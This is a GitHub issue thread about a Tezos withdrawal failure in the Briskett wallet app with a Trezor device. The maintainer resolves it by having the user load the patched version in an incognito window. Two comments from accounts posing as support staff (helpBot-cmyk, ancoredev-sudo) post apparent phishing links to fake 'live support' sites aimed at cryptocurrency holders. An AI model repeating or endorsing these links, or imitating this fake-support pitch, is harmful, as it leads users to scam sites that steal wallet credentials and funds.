### ISSUE TITLE
Hi Dev! I have been unable to withdraw my tesos from my trezor wallet via Briskett for several days now! Please fix this error! I don't know any other apps that support tesos staking via trezor! Thank you!

### ISSUE THREAD

**Issue by tarust777** [lousando/briskett#36]
**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Additional context**

**Comment by lousando** [comment]
Hey @tarust777, Briskett was recently patched a few days ago with version `v0.22.5`, sending Tezos is working again.

**Comment by helpBot-cmyk** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Briskett Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

> **Describe the bug** A clear and concise description of what the bug is.
> 
> **To Reproduce** Steps to reproduce the behavior:
> 
> 1. Go to '...'
> 2. Click on '....'
> 3. Scroll down to '....'
> 4. See error
> 
> **Expected behavior** A clear and concise description of what you expected to happen.
> 
> **Screenshots** If applicable, add screenshots to help explain your problem.
> 
> **Desktop (please complete the following information):**
> 
> * OS: [e.g. iOS]
> * Browser [e.g. chrome, safari]
> * Version [e.g. 22]
> 
> **Additional context** Add any other context about the problem here.

**Comment by ancoredev-sudo** [comment]
For the quickest resolution to your issue, we highly recommend using our live chat support, available 24/7. Our dedicated support team can provide real-time assistance and help resolve your complaint promptly. You can access the live chat here: [LIVE SUPPORT](https://dapps-exploreonsite.web.app/).

If live chat is unavailable or you prefer to continue via email, please rest assured that our team will review your ticket and follow up with you as soon as possible.

**Comment by tarust777** [comment]
> Hey @tarust777, Briskett was recently patched a few days ago with version `v0.22.5`, sending Tezos is working again.

But for some reason it doesn't work for me!?

**Comment by tarust777** [comment]
![Uploading Снимок экрана 2024-12-04 в 00.08.10.png…]()

**Comment by lousando** [comment]
@tarust777 Please reply back with some screenshots and an error message.

**Comment by tarust777** [comment]
> @tarust777 Please reply back with some screenshots and an error message.

I have it like this and even Trezor doesn't connect
![Uploading Снимок экрана 2024-12-04 в 00.15.59.png…]()

**Comment by lousando** [comment]
@tarust777 Please re-open Briskett in an incognito window so that you get the latest version as I see that you are still on `v0.22.4`

**Comment by tarust777** [comment]
> @tarust777 Please re-open Briskett in an incognito window so that you get the latest version as I see that you are still on `v0.22.4`

wow yes it worked in the incognito window opened a working version! Thanks bro!
